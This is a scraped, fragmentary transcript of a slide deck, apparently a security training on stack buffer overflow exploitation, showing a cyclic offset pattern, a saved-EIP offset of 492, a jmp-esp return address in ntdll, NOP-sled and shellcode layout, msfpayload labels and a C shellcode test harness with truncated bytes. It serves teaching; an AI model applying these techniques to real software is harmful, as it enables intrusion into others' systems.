powerpoint presentation - compass security...aa0aa1aa2aa3aa4aa5aa6aa7aa8aa9ab0ab1ab2ab3ab4ab...
TRANSCRIPT
![Page 1: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/1.jpg)
![Page 2: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/2.jpg)
![Page 3: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/3.jpg)
$ scp <remotefile> <localfile>
$ scp <Ax500> whatever.txt
![Page 4: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/4.jpg)
![Page 5: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/5.jpg)
![Page 6: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/6.jpg)
![Page 7: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/7.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
![Page 8: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/8.jpg)
![Page 9: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/9.jpg)
![Page 10: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/10.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Analyze:
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
Stored EIP @ location 492
![Page 11: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/11.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
payload[492]
sEIP
![Page 12: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/12.jpg)
![Page 13: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/13.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
sEIP
![Page 14: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/14.jpg)
![Page 15: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/15.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
ESP
sEIP
![Page 16: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/16.jpg)
![Page 17: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/17.jpg)
![Page 18: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/18.jpg)
msfpayload:
msfencode:
![Page 19: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/19.jpg)
#include <stdio.h> char code[] = "\xbb\xa0\xc9\xa5 ... "; int main(int argc, char **argv) { char x[500]; int (*func)(); func = (int (*)()) code; (int)(*func)(); }
GCC@WIN:
www.mingw.org
![Page 20: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/20.jpg)
![Page 21: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/21.jpg)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification:
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
Exploit: ESP
sEIP
![Page 22: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/22.jpg)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
Code
Stack
… jmp %esp …
[Filename] &caller [Stuff…] [Stuff…] [Stuff…] [Stuff…]
EIP (copy filename)
Stored EIP (caller)
![Page 23: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/23.jpg)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP (copy filename)
Stored EIP (caller)
![Page 24: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/24.jpg)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP
![Page 25: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/25.jpg)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP, EIP
![Page 26: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/26.jpg)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP
![Page 27: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/27.jpg)
Stored EIP
Shellcode
Filler
![Page 28: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/28.jpg)
Stored EIP
Shellcode
Filler
![Page 29: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/29.jpg)
&(jmp %esp @ ntdll): 0x7c91fcd8
![Page 30: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/30.jpg)
![Page 31: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/31.jpg)
![Page 32: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/32.jpg)
![Page 33: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/33.jpg)
![Page 34: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/34.jpg)
![Page 35: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/35.jpg)
![Page 36: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A](https://reader034.vdocument.in/reader034/viewer/2022050215/5f615ff58bbb717c6f3bcc96/html5/thumbnails/36.jpg)